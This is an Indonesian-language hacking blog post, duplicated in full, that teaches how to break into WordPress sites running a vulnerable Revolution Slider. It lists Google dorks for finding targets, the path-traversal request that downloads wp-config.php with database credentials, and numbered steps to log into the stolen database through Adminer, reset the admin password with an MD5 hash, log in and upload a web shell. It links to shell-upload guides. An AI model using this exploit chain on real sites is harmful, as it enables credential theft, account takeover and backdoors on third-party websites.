Langsung ajah ya gan ..
keperluan :
#Adminer: bisa pakai di http://keyrise.com/Adminer.php
#Dork: inurl:wp-content/themes/bazar/
#dork yg lain :
inurl:/wp-content/themes/theretailer
inurl:/wp-content/themes/incrediblewp
inurl:/wp-content/themes/revslider
inurl:/wp-content/themes/meteor-extras
#exploit: /wp-admin/admin-ajax.php?action=revolution-slider_show_image&img=../wp-config.php
#AdminLogin: /wp-admin/
#MD5encrypt: http://md5encryption.com/
#notepad++ / notepad biasa juga gapapa (kalo gak pusing :v)
KETERANGAN : kalo DB_host nya 'LocalHost' berarti susah /gak bisa masuk pakai adminer. (not vuln)
tapi kalo vuln / bisa masuk ke adminer , itu DB_HOSTnya biasa nya panjang seperti ini :
DB_HOST', 'zuffahome.db.9391735.hostedresource.com'); ( VULN )
Langkah"
1.copy dork ke google cari target
2.lalu beri exploit ,
contoh: http://localhost.com/
menjadi: http://localhost.com/wp-admin/admin-ajax.php?action=revolution-slider_show_image&img=../wp-config.php
nanti otomatis mendownload wp-config nya lalu SAVE ..
3.buka file yang tadi di download dengan notepad++
4.disitu terdapat db_name , db-user , db_password, db_host .. (lihat gambar)
5.lalu siapkan adminer , dan masukan data terserbut , tanpa tanda ' (karena disitu tandanya 'user')
6.lalu login.
7.setelah login , cari USER, disitu terdapat tulisan SELECT USER , pilih SELECT
8.lalu setelah muncul daftar admin / user nya .. pada nomer 1 user nya kamu klik edit
9.ubah username dan passwordnya .. password yg anda ubah harus di hash md5 dulu .. pakai md5encript lalu save
10. masuk ke halaman login admin nya.. dan masukan user n password yg kamu ubah tadi :v
11.setelah masuk , tinggal upload shell dah :v wkwkwk
kalo gak paham upload shell di wordpress bisa liat blog ini :
-http://scupeid.blogspot.com/2014/01/cara-mengupload-shell-di-wordpress_12.html atau
-http://trojanzboy.blogspot.com/2013/05/berbagai-cara-upload-shell-backdoor.html
TUTORIAL VIDEO
https://www.youtube.com/watch?v=zFGq-lxlEIw&feature=youtu.be
Thank Semoga Bermanfaat -/\-
SALAM
Mr.chucky
Cirebon Cyber Crime
keperluan :
#Adminer: bisa pakai di http://keyrise.com/Adminer.php
#Dork: inurl:wp-content/themes/bazar/
#dork yg lain :
inurl:/wp-content/themes/theretailer
inurl:/wp-content/themes/incrediblewp
inurl:/wp-content/themes/revslider
inurl:/wp-content/themes/meteor-extras
#exploit: /wp-admin/admin-ajax.php?action=revolution-slider_show_image&img=../wp-config.php
#AdminLogin: /wp-admin/
#MD5encrypt: http://md5encryption.com/
#notepad++ / notepad biasa juga gapapa (kalo gak pusing :v)
KETERANGAN : kalo DB_host nya 'LocalHost' berarti susah /gak bisa masuk pakai adminer. (not vuln)
tapi kalo vuln / bisa masuk ke adminer , itu DB_HOSTnya biasa nya panjang seperti ini :
DB_HOST', 'zuffahome.db.9391735.hostedresource.com'); ( VULN )
Langkah"
1.copy dork ke google cari target
2.lalu beri exploit ,
contoh: http://localhost.com/
menjadi: http://localhost.com/wp-admin/admin-ajax.php?action=revolution-slider_show_image&img=../wp-config.php
nanti otomatis mendownload wp-config nya lalu SAVE ..
3.buka file yang tadi di download dengan notepad++
4.disitu terdapat db_name , db-user , db_password, db_host .. (lihat gambar)
5.lalu siapkan adminer , dan masukan data terserbut , tanpa tanda ' (karena disitu tandanya 'user')
6.lalu login.
7.setelah login , cari USER, disitu terdapat tulisan SELECT USER , pilih SELECT
8.lalu setelah muncul daftar admin / user nya .. pada nomer 1 user nya kamu klik edit
9.ubah username dan passwordnya .. password yg anda ubah harus di hash md5 dulu .. pakai md5encript lalu save
10. masuk ke halaman login admin nya.. dan masukan user n password yg kamu ubah tadi :v
11.setelah masuk , tinggal upload shell dah :v wkwkwk
kalo gak paham upload shell di wordpress bisa liat blog ini :
-http://scupeid.blogspot.com/2014/01/cara-mengupload-shell-di-wordpress_12.html atau
-http://trojanzboy.blogspot.com/2013/05/berbagai-cara-upload-shell-backdoor.html
TUTORIAL VIDEO
https://www.youtube.com/watch?v=zFGq-lxlEIw&feature=youtu.be
Thank Semoga Bermanfaat -/\-
SALAM
Mr.chucky
Cirebon Cyber Crime
Komentar
Posting Komentar